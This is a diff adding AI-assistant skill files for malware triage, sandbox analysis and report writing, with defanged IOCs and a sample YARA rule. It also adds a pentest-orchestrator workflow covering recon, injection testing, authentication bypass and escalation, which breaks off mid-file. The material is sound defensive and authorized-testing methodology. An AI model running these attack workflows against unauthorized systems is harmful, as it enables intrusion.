+    Get-FileHash $_.FullName -Algorithm SHA256
+  }
+```
+
+### Phase 10: Cleanup and Reset
+
+**Before Reverting VM:**
+1. All evidence exported and saved
+2. Hashes calculated for all artifacts
+3. Network captures saved
+4. Process dumps saved (if needed)
+5. Screenshots organized
+
+**Revert to Clean Snapshot:**
+```
+VMware: VM → Snapshot → Revert to Snapshot
+VirtualBox: Machine → Close → Restore current snapshot
+```
+
+## Automated Sandbox Analysis
+
+### ANY.RUN (Interactive Cloud Sandbox)
+
+**When to Use:**
+- Need quick behavioral analysis
+- Want to interact with malware during execution
+- Need visual demonstration of behavior
+- Time-constrained analysis
+
+**Workflow:**
+1. Upload sample to https://app.any.run
+2. Select Windows version
+3. Choose network simulation
+4. Click "Run"
+5. Monitor real-time: process tree, network requests, file operations
+6. Download artifacts: PCAP, process dumps, dropped files, IOCs
+
+## Behavioral IOC Extraction
+
+**From Dynamic Analysis, Extract:**
+
+**Process IOCs:**
+```
+Process Name: sample.exe
+Parent Process: explorer.exe
+Command Line: C:\Users\Public\sample.exe /install
+Child Processes: cmd.exe, powershell.exe
+Mutex: Global\UniqueMalwareMutex
+```
+
+**File IOCs:**
+```
+Created Files:
+- C:\Users\<user>\AppData\Local\Temp\payload.exe (SHA256: abc123...)
+- C:\ProgramData\config.dat
+```
+
+**Registry IOCs:**
+```
+Created Keys:
+HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefender
+  Value: C:\Users\Public\malware.exe
+```
+
+**Network IOCs:**
+```
+DNS Queries:
+- malicious-c2[.]com
+- backup-server[.]tk
+
+HTTP Requests:
+- hxxp://malicious-c2[.]com/api/checkin
+  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
+```
+
+## Quality Checklist
+
+Before concluding dynamic analysis:
+
+**Execution Environment:**
+- [ ] VM properly isolated (verified)
+- [ ] All monitoring tools captured data
+- [ ] Execution time sufficient (15+ minutes minimum)
+- [ ] Clean snapshot available for re-analysis
+
+**Process Monitoring:**
+- [ ] All spawned processes documented
+- [ ] Process tree captured
+- [ ] Command-line arguments recorded
+- [ ] Process injection observed (if any)
+- [ ] Memory dumps saved (if relevant)
+
+**File System:**
+- [ ] All dropped files identified and hashed
+- [ ] File paths documented
+- [ ] Dropped files saved to evidence
+- [ ] File modifications logged
+- [ ] Deletion activities recorded
+
+**Registry:**
+- [ ] Persistence mechanisms identified
+- [ ] Registry changes documented
+- [ ] Configuration keys noted
+- [ ] Registry export saved
+
+**Network:**
+- [ ] Full PCAP captured
+- [ ] DNS queries extracted
+- [ ] C2 servers identified
+- [ ] Network protocols documented
+- [ ] Data exfiltration noted
+
+**Evidence Collection:**
+- [ ] All artifacts exported
+- [ ] Hashes calculated
+- [ ] Timestamps recorded (UTC)
+- [ ] Screenshots saved
+- [ ] Logs organized in case folder
+
+## Best Practices
+
+### Do:
+- Always take VM snapshot before execution
+- Run monitoring tools BEFORE executing malware
+- Document observations in real-time
+- Capture evidence continuously
+- Verify network isolation
+- Use multiple monitoring tools
+- Save everything (disk is cheap)
+- Test IOCs for accuracy
+- Document timeline of events
+
+### Don't:
+- Execute without proper isolation
+- Trust timestamps from malware
+- Assume short execution time is sufficient
+- Execute on production systems (NEVER!)
+- Share VM with other activities
+- Enable internet without INetSim
+- Forget to export evidence before reverting
+- Rely on single monitoring tool
+- Skip documentation during execution
+
+## Integration with Report Writing
+
+Dynamic analysis provides:
+- **Execution Flow** → Report: Technical Analysis section
+- **Process Activity** → Report: Behavior Analysis
+- **Network IOCs** → Report: Network Indicators
+- **File IOCs** → Report: File Indicators
+- **Persistence** → Report: Persistence Mechanisms
+- **Screenshots** → Report: Appendix
+- **Timeline** → Report: Execution Timeline
+
+Use findings to:
+- Validate static analysis hypotheses
+- Create behavioral YARA rules
+- Write Sigma detection rules
+- Develop hunting queries
+- Document MITRE ATT&CK techniques
+
+## Example Usage
+
+**User request:** "Help me safely execute this ransomware sample and document its behavior"
+
+**Workflow:**
+1. Verify VM isolation and safety checklist
+2. Guide monitoring tool setup (Procmon, Wireshark, Process Hacker)
+3. Execute sample with observation
+4. Document process creation and injection
+5. Capture file encryption behavior
+6. Extract ransom note and C2 communications
+7. Collect all artifacts
+8. Generate behavioral IOCs
+9. Create timeline of execution
+10. Prepare findings for report integration

--- a/skills/malware-report-writer/SKILL.md
+++ b/skills/malware-report-writer/SKILL.md
@@ -1,0 +1,223 @@
+---
+name: malware-report-writer
+description: Professional malware analysis report creation for enterprise malware analysis and incident response. Use when the user needs to create, structure, or improve a malware analysis report, write technical documentation for malware samples, create executive summaries, or format IOCs and detection rules for professional delivery.
+category: soc
+---
+
+# Malware Report Writer
+
+Create professional, comprehensive malware analysis reports for enterprise security teams, incident response, and threat intelligence.
+
+## When to Use This Skill
+
+Use this skill when the user needs to:
+- Create a complete malware analysis report from analysis findings
+- Structure analysis results into professional documentation
+- Write executive summaries for malware samples
+- Format IOCs and detection rules for delivery
+- Review or improve existing malware reports
+- Prepare report documentation for stakeholders
+
+## Quick Start
+
+### Creating a New Report
+
+1. Use the report template below as the base structure
+2. Gather all analysis artifacts:
+   - Sample hashes and file information
+   - Static analysis findings (strings, imports, PE structure)
+   - Dynamic analysis observations (processes, registry, network, files)
+   - IOCs identified
+   - Detection rules created
+3. Populate each section systematically
+4. Review against the quality checklist
+
+### Report Structure
+
+The standard report includes these sections in order:
+
+1. **Executive Summary** - High-level overview for non-technical stakeholders
+2. **Sample Information** - Basic file metadata and hashes
+3. **Static Analysis** - File structure, strings, imports/exports, resources
+4. **Dynamic Analysis** - Runtime behavior, system changes, network activity
+5. **IOCs** - Organized by type (file, network, host indicators)
+6. **Detection Rules** - YARA rules and optionally Sigma rules
+7. **Malware Classification** - Family, type, capabilities
+8. **Remediation and Mitigation** - Actionable response steps
+9. **Technical Details** - Additional deep-dive analysis
+10. **Conclusion** - Final summary and assessment
+11. **References** - External resources and links
+12. **Appendix** - Timeline, tools used, screenshots
+
+## Key Principles
+
+### Professional Quality
+- Use precise technical language with clear explanations
+- Include all three hash types (MD5, SHA1, SHA256)
+- Provide full context for every finding
+- Document methodology and tools used
+- Include timestamps and version information
+
+### Professional Report Requirements
+Industry-standard reports require:
+- Complete technical documentation of malware samples
+- Professional format suitable for enterprise delivery
+- Working detection rules based on malware characteristics
+- Clear IOCs that can be operationalized
+
+**Critical:** The quality of your report reflects your professionalism. Allocate sufficient time for writing and review.
+
+### Audience Awareness
+Structure content for multiple audiences:
+- **Executive Summary**: Non-technical decision makers
+- **Technical Sections**: Security analysts and researchers
+- **IOCs/Detection**: SOC teams and detection engineers
+- **Remediation**: Incident responders
+
+## Writing Guidelines
+
+### Executive Summary
+- 2-4 paragraphs maximum
+- Plain language, minimal jargon
+- Answer: What? How critical? What actions?
+- Include key findings in bullet points
+
+### Technical Analysis
+- Document both positive and negative findings
+- Provide evidence for every claim
+- Use code blocks for technical artifacts
+- Include screenshots when they add value
+- Connect behaviors to specific evidence
+
+### IOCs Section
+**Format:**
+- Group by type (file, network, host)
+- Include context for each indicator
+- Provide confidence levels if uncertain
+- Test IOCs for accuracy before including
+
+**Avoid:**
+- Environment-specific artifacts
+- Personal/analyst system information
+- Common legitimate values
+- Untested indicators
+
+### Detection Rules
+**YARA Rules:**
+- Test against sample (must detect)
+- Test against clean files (must not false positive)
+- Include metadata: author, date, description, hash
+- Use meaningful string and variable names
+- Add comments explaining detection logic
+- Set appropriate conditions to balance detection and false positives
+
+**Best practices:**
+```yara
+rule Malware_Family_Variant {
+    meta:
+        description = "Detects Malware_Family based on C2 configuration"
+        author = "Analyst Name"
+        date = "2025-10-25"
+        hash = "abc123..."
+        reference = "Internal analysis"
+
+    strings:
+        $c2_config = { 48 8B ?? ?? ?? ?? ?? 48 8D ?? ?? }  // Config access pattern
+        $ua_string = "Mozilla/4.0 (Suspicious UA)" ascii
+        $mutex = "Global\\UniqueMalwareMutex" wide
+
+    condition:
+        uint16(0) == 0x5A4D and  // MZ header
+        filesize < 2MB and
+        2 of them
+}
+```
+
+### Common Mistakes to Avoid
+- Over-relying on automated tool output without interpretation
+- Listing findings without explaining significance
+- Missing critical hashes or file metadata
+- Weak or untested detection rules
+- Vague remediation recommendations
+- Poor grammar/spelling
+- Inconsistent formatting
+- Environment-specific artifacts in IOCs
+
+## Time Management Strategies
+
+For efficient malware report creation:
+
+**Recommended workflow:**
+- **Phase 1-2**: Analysis
+  - Document findings continuously (don't wait)
+  - Take screenshots and capture evidence
+  - Create detection rules during analysis
+  - Organize notes by report section
+
+- **Phase 3-4**: Report writing
+  - Draft all technical sections first
+  - Write IOCs, detection rules, remediation
+  - Create executive summary and conclusion
+  - Final quality check and formatting
+
+**Pro tip:** Start documenting in report format during analysis to save time.
+
+## Quality Checklist
+
+Before submitting any report, verify:
+
+**Technical Accuracy:**
+- [ ] All three hash types included and verified
+- [ ] File paths are complete and accurate
+- [ ] Timestamps include timezone
+- [ ] Process IDs included for process activity
+- [ ] Tool versions documented
+
+**Detection Rules:**
+- [ ] YARA rules tested against sample (detects correctly)
+- [ ] YARA rules tested against clean files (no false positives)
+- [ ] Rules include complete metadata
+- [ ] Conditions are appropriate and not over-matching
+
+**IOCs:**
+- [ ] Grouped by type (file, network, host)
+- [ ] Context provided for each IOC
+- [ ] No environment-specific artifacts
+- [ ] All IOCs validated
+
+**Report Quality:**
+- [ ] Executive summary is non-technical and actionable
+- [ ] All sections completed
+- [ ] Grammar and spelling checked
+- [ ] Consistent formatting throughout
+- [ ] Evidence supports all claims
+- [ ] Remediation steps are specific and prioritized
+
+**Professional Standards:**
+- [ ] Report is professional and enterprise-ready
+- [ ] Detection rules work and are well-documented
+- [ ] Technical details demonstrate thorough analysis
+- [ ] Report answers: What is it? What does it do? How to detect? How to remove?
+
+## Output Format
+
+Create reports in Markdown format using the template structure. For professional delivery:
+1. Create report in Markdown using the template
+2. Convert to PDF for professional appearance (if required)
+3. Ensure all sections are complete
+4. Include any screenshots as appendix items
+5. Verify detection rules are included and tested
+
+## Example Usage
+
+**User request:** "Help me write a report for this ransomware sample I analyzed"
+
+**Workflow:**
+1. Load the report template
+2. Ask user for key findings from their analysis
+3. Structure findings into appropriate sections
+4. Help craft executive summary
+5. Format IOCs properly
+6. Review and validate YARA rules
+7. Provide remediation recommendations
+8. Review final report against quality checklist

--- a/skills/malware-report-writer/SKILL.md
+++ b/skills/malware-report-writer/SKILL.md
@@ -1,7 +1,10 @@
 ---
 name: malware-report-writer
-description: Professional malware analysis report creation for enterprise malware analysis and incident response. Use when the user needs to create, structure, or improve a malware analysis report, write technical documentation for malware samples, create executive summaries, or format IOCs and detection rules for professional delivery.
-category: soc
+description: "Create professional malware analysis reports. Trigger: writing analysis reports, documenting malware samples, creating executive summaries, or formatting IOCs."
+license: Apache-2.0
+metadata:
+  author: gentleman-programming
+  version: "1.0"
 ---
 
 # Malware Report Writer
@@ -221,3 +224,14 @@ Create reports in Markdown format using the template structure. For professional
 6. Review and validate YARA rules
 7. Provide remediation recommendations
 8. Review final report against quality checklist
+
+## Validation
+
+To verify this skill works correctly:
+
+1. **Load test**: Confirm the skill loads without frontmatter parsing errors.
+2. **Template test**: Validate the 12-section report structure is complete and properly ordered.
+3. **YARA test**: Check the example YARA rule has valid syntax (meta, strings, condition sections).
+4. **Checklist test**: Verify all quality checklist categories (Technical Accuracy, Detection Rules, IOCs, Report Quality, Professional Standards) have complete items.
+5. **Audience test**: Confirm content guidance addresses all 4 audiences (executive, technical, SOC, IR).
+6. **Integration test**: Confirm referenced skills (malware-triage, malware-dynamic-analysis, specialized-file-analyzer, detection-engineer) exist.

--- a/skills/malware-triage/SKILL.md
+++ b/skills/malware-triage/SKILL.md
@@ -1,7 +1,10 @@
 ---
 name: malware-triage
-description: Systematic malware triage and initial assessment workflow for professional malware analysis. Use when the user needs to perform initial malware assessment, classify samples, determine analysis priority, identify quick indicators, or decide on next analysis steps. Also use for rapid malware identification and threat classification.
-category: soc
+description: "Systematic malware triage workflow. Trigger: performing initial assessment, classifying samples, determining priority, or identifying quick indicators."
+license: Apache-2.0
+metadata:
+  author: gentleman-programming
+  version: "1.0"
 ---
 
 # Malware Triage
@@ -435,3 +438,14 @@ Before concluding triage:
 6. Predict behaviors
 7. Recommend next steps
 8. Create triage report
+
+## Validation
+
+To verify this skill works correctly:
+
+1. **Load test**: Confirm the skill loads without frontmatter parsing errors.
+2. **Workflow test**: Verify all 5 triage phases (Basic Info, Static Analysis, Classification, Behavior Prediction, Priority) are documented with clear steps.
+3. **Template test**: Validate the triage report template YAML/Markdown renders correctly with all required fields.
+4. **Scenario test**: Check all 3 common triage scenarios (Unknown Executable, Suspicious Document, Known Variant) have complete workflows.
+5. **Checklist test**: Verify the quality checklist has all 13 items present and actionable.
+6. **Integration test**: Confirm referenced skills (malware-dynamic-analysis, specialized-file-analyzer, malware-report-writer) exist.

--- a/skills/malware-triage/SKILL.md
+++ b/skills/malware-triage/SKILL.md
@@ -1,0 +1,437 @@
+---
+name: malware-triage
+description: Systematic malware triage and initial assessment workflow for professional malware analysis. Use when the user needs to perform initial malware assessment, classify samples, determine analysis priority, identify quick indicators, or decide on next analysis steps. Also use for rapid malware identification and threat classification.
+category: soc
+---
+
+# Malware Triage
+
+Systematic workflow for rapid malware assessment, classification, and prioritization for professional malware analysis and enterprise security operations.
+
+## When to Use This Skill
+
+Use this skill when the user needs to:
+- Perform initial assessment of malware samples
+- Quickly classify and prioritize samples
+- Identify key indicators without deep analysis
+- Decide whether to proceed with full analysis
+- Triage multiple samples efficiently
+- Create initial findings summary
+- Predict malware behaviors before dynamic analysis
+
+## Overview
+
+Triage is the critical first phase of malware analysis that:
+1. Quickly identifies key characteristics
+2. Classifies malware type and threat level
+3. Determines analysis priority
+4. Predicts behaviors to guide deeper analysis
+5. Extracts immediate IOCs
+
+**Goal:** Make informed decisions about analysis approach within 5-30 minutes per sample.
+
+## Triage Workflow
+
+### Phase 1: Basic Information Gathering (5 minutes)
+
+**Calculate Hashes:**
+```bash
+sha256sum sample.exe
+md5sum sample.exe
+sha1sum sample.exe
+```
+
+Document:
+- MD5, SHA1, SHA256
+- Original filename
+- File size
+- File type (PE32/PE64/Script/Document)
+
+**Check Online Reputation:**
+- VirusTotal (virustotal.com)
+- MalwareBazaar (bazaar.abuse.ch)
+- Hybrid Analysis
+- Any.Run
+
+Record:
+- Detection rate
+- Known family name (if identified)
+- Previous submission dates
+- Community comments
+
+### Phase 2: Quick Static Analysis (10 minutes)
+
+**For PE Files:**
+1. Check packing/obfuscation
+   - Use Detect It Easy (DIE) or PEiD
+   - Check entropy (>7.0 = likely packed)
+   - Document packer name if identified
+
+2. Examine PE structure
+   - Compilation timestamp
+   - Section names and characteristics
+   - Digital signature status
+   - Entry point location
+   - Overlay data presence
+
+3. Review import table
+   - Note process injection functions
+   - Note network functions
+   - Note anti-analysis functions
+
+4. Extract strings
+   - URLs and IP addresses
+   - File paths
+   - Registry keys
+   - Mutex names
+   - Error messages
+   - Email addresses
+
+**For Scripts (PowerShell, VBS, JavaScript):**
+1. Check obfuscation level
+2. Look for Base64/hex encoding
+3. Identify download/execute patterns
+4. Extract URLs and IPs
+5. Check for embedded payloads
+
+**For Office Documents:**
+1. Check for macros
+2. Examine OLE streams
+3. Look for external references
+4. Check metadata
+5. Identify exploit indicators
+
+### Phase 3: Classification (5 minutes)
+
+**Determine Malware Type:**
+
+Common types:
+- **Trojan/RAT** - Remote access, C2 communication
+- **Ransomware** - File encryption, ransom demands
+- **Infostealer** - Credential theft, browser data
+- **Dropper/Loader** - Delivers additional payloads
+- **Cryptominer** - Cryptocurrency mining
+- **Backdoor** - Persistent remote access
+- **Worm** - Self-propagating
+
+**Assess Threat Level:**
+- **Critical** - Destructive, ransomware, APT
+- **High** - Data theft, full system compromise
+- **Medium** - Limited capabilities, targeted
+- **Low** - Minimal impact, commodity malware
+
+**Evaluate Sophistication:**
+- **Simple** - Basic functionality, no obfuscation
+- **Moderate** - Some protection, standard techniques
+- **Advanced** - Heavy obfuscation, anti-analysis
+- **APT-level** - Custom, targeted, advanced evasion
+
+### Phase 4: Behavior Prediction (5 minutes)
+
+Based on static indicators, predict:
+
+**Process Activity:**
+- Will it create child processes?
+- Process injection expected?
+- Which processes targeted?
+
+**File System:**
+- Files likely to be created (paths)
+- Files likely to be modified
+- Files likely to be deleted
+
+**Registry:**
+- Persistence keys likely to be used
+- Configuration storage locations
+- System modifications expected
+
+**Network:**
+- C2 communication expected?
+- Protocol (HTTP/HTTPS/Raw TCP/IRC/DNS)
+- Beacon interval pattern
+- Data exfiltration likely?
+
+**Persistence:**
+- Mechanism (Run key/Service/Task/Startup)
+- Location and method
+
+### Phase 5: Priority and Decision (5 minutes)
+
+**Determine Priority:**
+
+**Immediate** (analyze now):
+- Unknown samples unclear threat
+- Active incident-related
+- Destructive capabilities
+- APT/targeted indicators
+- Recent threat intel matches
+
+**Standard** (normal queue):
+- Known variant
+- Commodity malware
+- Clear signatures available
+- Historical/research samples
+
+**Low** (defer if needed):
+- Clearly identified common malware
+- Adware/PUP minimal impact
+- Old/outdated samples
+- Likely false positives
+
+**Analysis Decision:**
+
+Proceed with full analysis if:
+- Unknown/new sample
+- Need behavioral confirmation
+- Creating signatures required
+- Investigating specific functionality
+
+Quick report if:
+- Known malware with existing docs
+- Time-constrained triage
+- Clear identification from reputation check
+
+## Triage Report Template
+
+Use this format to document findings:
+
+```markdown
+## Malware Triage Report
+
+**Sample:** [filename]
+**Date:** [date]
+**Analyst:** [name]
+
+### File Information
+- **MD5:** [hash]
+- **SHA1:** [hash]
+- **SHA256:** [hash]
+- **Size:** [bytes]
+- **Type:** [PE32/PE64/Script/etc]
+- **Packed:** [Yes/No - Packer name]
+
+### Online Reputation
+- **VirusTotal:** [XX/YY detections - Link]
+- **Known Family:** [Family name or Unknown]
+- **First Seen:** [Date or Unknown]
+
+### Static Indicators
+
+**PE Analysis:**
+- Compilation Date: [date]
+- Digital Signature: [Valid/Invalid/None]
+- Sections: [names and entropy]
+- Entry Point: [location]
+
+**Suspicious Imports:**
+- [DLL]: [Function, Function, ...]
+- [Key: Process injection, Network, Anti-analysis]
+
+**Notable Strings:**
+- URLs: [list]
+- IPs: [list]
+- Paths: [list]
+- Registry: [list]
+- Mutex: [name if found]
+
+### Classification
+
+**Type:** [Trojan/Ransomware/Infostealer/etc]
+**Threat Level:** [Critical/High/Medium/Low]
+**Sophistication:** [Simple/Moderate/Advanced/APT]
+
+**Primary Capabilities:**
+- [Capability 1]
+- [Capability 2]
+- [Capability 3]
+
+### Predicted Behaviors
+
+**Process Activity:**
+- [Expected behavior]
+
+**File System:**
+- [Expected modifications]
+
+**Registry:**
+- [Expected changes]
+
+**Network:**
+- [Expected communication]
+
+**Persistence:**
+- [Expected mechanism]
+
+### Initial IOCs
+
+**File Indicators:**
+- Hashes listed above
+- [Additional file indicators]
+
+**Network Indicators:**
+- [IPs from strings]
+- [Domains from strings]
+
+**Host Indicators:**
+- [Registry keys]
+- [File paths]
+- [Mutex names]
+
+### Recommendation
+
+**Priority:** [Immediate/Standard/Low]
+
+**Next Steps:**
+1. [Action 1 - e.g., Proceed with full dynamic analysis]
+2. [Action 2 - e.g., Create YARA rule]
+3. [Action 3 - e.g., Search network for IOCs]
+
+**Analysis Approach:**
+[Full analysis / Behavioral confirmation / Quick signature creation]
+
+**Estimated Time:** [time estimate for full analysis]
+```
+
+## Time Management
+
+### Professional Analysis Context
+When analyzing multiple samples, efficient triage is critical:
+
+**Quick Triage (5 min/sample):**
+- Hashes + VirusTotal
+- Basic file info
+- Quick priority decision
+
+**Standard Triage (15 min/sample):**
+- Above + imports analysis
+- String extraction
+- Classification
+- Behavior prediction
+
+**Comprehensive Triage (30 min/sample):**
+- Above + detailed documentation
+- Initial IOC list
+- Full prediction writeup
+- YARA concept notes
+
+**Strategy:**
+- Quick triage ALL samples first
+- Prioritize based on findings
+- Comprehensive triage high-priority samples
+- Defer or quick-report low-priority samples
+
+## Tools and Scripts
+
+### Recommended External Tools
+
+**Static Analysis:**
+- Detect It Easy (DIE) - Packer detection
+- PEStudio - PE analysis
+- strings / FLOSS - String extraction
+- HxD - Hex editor
+- CFF Explorer - PE structure
+
+**Online Services:**
+- VirusTotal - Multi-engine scanning
+- MalwareBazaar - Sample database
+- Hybrid Analysis - Automated analysis
+- Any.Run - Interactive sandbox
+
+## Best Practices
+
+### Do:
+- Always calculate all three hashes immediately
+- Check multiple reputation sources
+- Document findings as you discover them
+- Use checklists to ensure completeness
+- Consider false positive possibilities
+- Predict behaviors before dynamic analysis
+- Prioritize samples logically
+
+### Don't:
+- Skip basic file information
+- Rely solely on VirusTotal results
+- Assume packing means malicious
+- Execute without proper isolation
+- Trust timestamps (easily forged)
+- Ignore negative findings
+- Rush classification decisions
+
+### Efficiency Tips:
+1. Have tools ready and scripts prepared
+2. Use templates for documentation
+3. Automate hash calculation
+4. Keep a reference of common indicators
+5. Build up a personal knowledge base
+6. Take notes during, not after
+7. Use multiple monitors if possible
+
+## Common Triage Scenarios
+
+### Scenario 1: Unknown Executable
+1. Calculate hashes → not found online
+2. Check packing → heavily packed
+3. Review imports → suspicious injection/network APIs
+4. Classification → likely trojan/RAT
+5. Decision → Full analysis required
+
+### Scenario 2: Suspicious Document
+1. Calculate hashes → 0 detections
+2. Check macros → obfuscated VBA
+3. Extract strings → download URLs found
+4. Classification → dropper via macro
+5. Decision → Dynamic analysis of macro behavior
+
+### Scenario 3: Known Malware Variant
+1. Calculate hashes → 50+ detections, identified as Emotet
+2. Review VirusTotal → well-documented
+3. Quick checks → confirms expected indicators
+4. Classification → confirmed Emotet variant
+5. Decision → Quick report, no deep analysis needed
+
+## Integration with Full Analysis
+
+Triage findings guide the full analysis:
+
+**Use predictions to:**
+- Know what to monitor during dynamic analysis
+- Set up appropriate monitoring tools
+- Focus on predicted areas first
+- Validate or refute hypotheses
+
+**Triage report becomes:**
+- Introduction section of full report
+- Hypothesis to test during analysis
+- Quick reference during investigation
+- Foundation for IOC development
+
+## Quality Checklist
+
+Before concluding triage:
+- [ ] All three hashes calculated and verified
+- [ ] Online reputation checked (at least VirusTotal)
+- [ ] File type and basic info documented
+- [ ] Packing status determined
+- [ ] Key imports identified
+- [ ] Notable strings extracted
+- [ ] Classification assigned with reasoning
+- [ ] Threat level assessed
+- [ ] Behaviors predicted
+- [ ] Priority determined
+- [ ] Next steps documented
+- [ ] Initial IOCs listed
+- [ ] Findings clearly documented
+
+## Example Usage
+
+**User request:** "I have a suspicious .exe file, help me triage it"
+
+**Workflow:**
+1. Guide user to calculate hashes
+2. Check online reputation together
+3. Examine PE structure and imports
+4. Extract and review strings
+5. Classify based on indicators
+6. Predict behaviors
+7. Recommend next steps
+8. Create triage report

--- a/skills/pentest-orchestrator/SKILL.md
+++ b/skills/pentest-orchestrator/SKILL.md
@@ -1,0 +1,449 @@
+---
+name: pentest-orchestrator
+description: AI-driven penetration testing orchestration methodology for structuring autonomous or semi-autonomous security assessments. Use when planning multi-phase pentests, coordinating recon/scanning/exploitation workflows, implementing parallel testing streams, and adapting strategy mid-engagement based on findings.
+category: red-team
+---
+
+# Pentest Orchestrator
+
+Structure and coordinate AI-assisted penetration testing engagements with multi-phase workflows, parallel execution streams, adaptive strategy, and finding-driven pivoting.
+
+## When to Use This Skill
+
+Use this skill when you need to:
+- **Plan** a structured penetration test with AI assistance
+- **Orchestrate** multiple testing phases (recon → scan → exploit → report)
+- **Coordinate** parallel testing streams for efficiency
+- **Adapt** strategy mid-engagement based on discovered findings
+- **Prioritize** targets and attack vectors dynamically
+- **Track** coverage to ensure comprehensive testing
+- **Generate** professional reports from orchestrated findings
+
+## Orchestration Architecture
+
+### Three-Stream Parallel Model
+
+Run three concurrent streams that feed findings to each other:
+
+```
+┌─────────────────────────────────────────────────────────┐
+│                    ORCHESTRATOR                          │
+│         (Coordinates streams, manages state)             │
+└──────────────┬──────────────┬──────────────┬────────────┘
+               │              │              │
+    ┌──────────▼───┐  ┌──────▼───────┐  ┌──▼──────────┐
+    │  STREAM 1    │  │  STREAM 2    │  │  STREAM 3   │
+    │  Recon       │  │  Testing     │  │  Tool       │
+    │  Agent       │  │  Agent       │  │  Runner     │
+    │              │  │              │  │             │
+    │ - Subdomains │  │ - Vuln tests │  │ - nmap      │
+    │ - DNS enum   │  │ - Auth tests │  │ - nuclei    │
+    │ - Tech stack │  │ - Logic bugs │  │ - ffuf      │
+    │ - Endpoints  │  │ - API tests  │  │ - sqlmap    │
+    └──────┬───────┘  └──────┬───────┘  └──────┬──────┘
+           │                 │                  │
+           └─────────────────┼──────────────────┘
+                             │
+                    ┌────────▼────────┐
+                    │  SHARED STATE   │
+                    │  (Findings DB)  │
+                    └─────────────────┘
+```
+
+**Stream 1 - Recon Agent:**
+- Discovers attack surface (subdomains, endpoints, technologies)
+- Feeds discovered endpoints to Stream 2 and Stream 3
+- Runs continuously, expanding scope as new assets are found
+
+**Stream 2 - Testing Agent:**
+- AI-driven vulnerability testing on discovered endpoints
+- Tests business logic, authentication, authorization
+- Uses findings from Stream 3 to identify areas needing manual attention
+
+**Stream 3 - Tool Runner:**
+- Executes security tools (nmap, nuclei, ffuf, sqlmap, etc.)
+- Feeds tool output back to Stream 2 for AI analysis
+- Handles automated scanning at scale
+
+### Communication Protocol
+
+Streams communicate via a shared findings database:
+
+```python
+# Finding structure shared between streams
+class Finding:
+    id: str                    # Unique identifier
+    source_stream: str         # Which stream discovered it
+    finding_type: str          # "endpoint", "vulnerability", "info"
+    target: str                # URL, IP, or resource
+    severity: str              # critical, high, medium, low, info
+    confidence: int            # 0-100 (from validation pipeline)
+    details: dict              # Finding-specific data
+    chain_candidates: list     # IDs of related findings
+    status: str                # "new", "validated", "reported", "false_positive"
+    timestamp: datetime
+
+# Stream messages
+class StreamMessage:
+    type: str                  # "new_target", "finding", "coverage_update"
+    source: str                # Stream ID
+    data: dict                 # Message payload
+```
+
+## Engagement Phases
+
+### Phase 0: Scoping & Setup
+
+Before any testing begins:
+
+```yaml
+scope_definition:
+  in_scope:
+    - domains: ["target.com", "*.target.com"]
+    - ip_ranges: ["10.0.0.0/24"]
+    - applications: ["https://app.target.com"]
+  out_of_scope:
+    - domains: ["mail.target.com"]
+    - ip_ranges: ["10.0.1.0/24"]
+    - notes: "Production database - read-only testing"
+
+  rules_of_engagement:
+    - "No denial of service testing"
+    - "No social engineering"
+    - "Testing window: Mon-Fri 09:00-17:00 UTC"
+    - "Emergency contact: security@target.com"
+    - "Rate limit: max 50 requests/second"
+
+  objectives:
+    primary: "Identify vulnerabilities in web application"
+    secondary: "Assess API security posture"
+    deliverable: "Professional pentest report with remediation"
+```
+
+### Phase 1: Reconnaissance
+
+```yaml
+passive_recon:
+  tasks:
+    - subdomain_enumeration:
+        tools: ["subfinder", "amass", "assetfinder"]
+        output: "List of live subdomains"
+    - technology_detection:
+        tools: ["whatweb", "wappalyzer"]
+        output: "Tech stack per subdomain"
+    - endpoint_discovery:
+        tools: ["katana", "gau", "waybackurls"]
+        output: "List of known endpoints"
+    - dns_analysis:
+        tools: ["dnsx", "dig"]
+        output: "DNS records, potential takeovers"
+
+active_recon:
+  tasks:
+    - port_scanning:
+        tools: ["nmap", "rustscan", "naabu"]
+        output: "Open ports and services per host"
+    - directory_bruteforce:
+        tools: ["ffuf", "feroxbuster", "gobuster"]
+        output: "Hidden endpoints and directories"
+    - api_discovery:
+        tools: ["ffuf with API wordlists"]
+        output: "API endpoints, versions, documentation"
+
+  output_to_next_phase:
+    - live_hosts: "List of responsive hosts with ports"
+    - endpoints: "Complete endpoint map"
+    - tech_stack: "Technologies per host (for targeted testing)"
+    - attack_surface: "Summary of entry points"
+```
+
+### Phase 2: Vulnerability Assessment
+
+```yaml
+automated_scanning:
+  tasks:
+    - vulnerability_scan:
+        tools: ["nuclei"]
+        templates: ["cves", "exposures", "misconfigurations"]
+        output: "Known CVEs and misconfigurations"
+    - web_vulnerability_scan:
+        tools: ["nikto", "wpscan (if WordPress)"]
+        output: "Web server and CMS vulnerabilities"
+
+ai_driven_testing:
+  tasks:
+    - waf_detection:
+        skill: "waf-detection-bypass"
+        output: "WAF vendor, bypass techniques"
+    - authentication_testing:
+        checks:
+          - "Default credentials"
+          - "Brute force protection"
+          - "Password policy enforcement"
+          - "Session management"
+          - "Multi-factor authentication bypass"
+    - authorization_testing:
+        checks:
+          - "IDOR on all resource endpoints"
+          - "Horizontal privilege escalation"
+          - "Vertical privilege escalation"
+          - "Missing function-level access control"
+    - injection_testing:
+        checks:
+          - "SQL injection (all input points)"
+          - "XSS (reflected, stored, DOM)"
+          - "Command injection"
+          - "SSTI/CSTI"
+          - "LDAP injection"
+    - business_logic:
+        checks:
+          - "Race conditions"
+          - "Price manipulation"
+          - "Workflow bypass"
+          - "Rate limit bypass"
+
+  validation:
+    skill: "ai-pentesting-validation"
+    requirements:
+      - "Every finding passes negative control"
+      - "Every finding has proof-of-execution"
+      - "Minimum confidence: 60"
+```
+
+### Phase 3: Exploitation & Chain Analysis
+
+```yaml
+exploitation:
+  tasks:
+    - validate_findings:
+        skill: "ai-pentesting-validation"
+        output: "Validated vulnerability list with confidence scores"
+    - chain_analysis:
+        skill: "exploit-chain-patterns"
+        output: "Identified attack chains with impact scores"
+    - proof_of_concept:
+        requirements:
+          - "Safe, reproducible PoC for each finding"
+          - "No destructive payloads"
+          - "Screenshots and HTTP logs for evidence"
+
+  adaptive_strategy:
+    description: "Adjust testing based on findings so far"
+    rules:
+      - trigger: "SSRF found"
+        action: "Test internal network reachability, cloud metadata"
+      - trigger: "SQLi found"
+        action: "Attempt DB-specific escalation (see exploit-chain-patterns)"
+      - trigger: "Auth bypass found"
+        action: "Test all admin functionality"
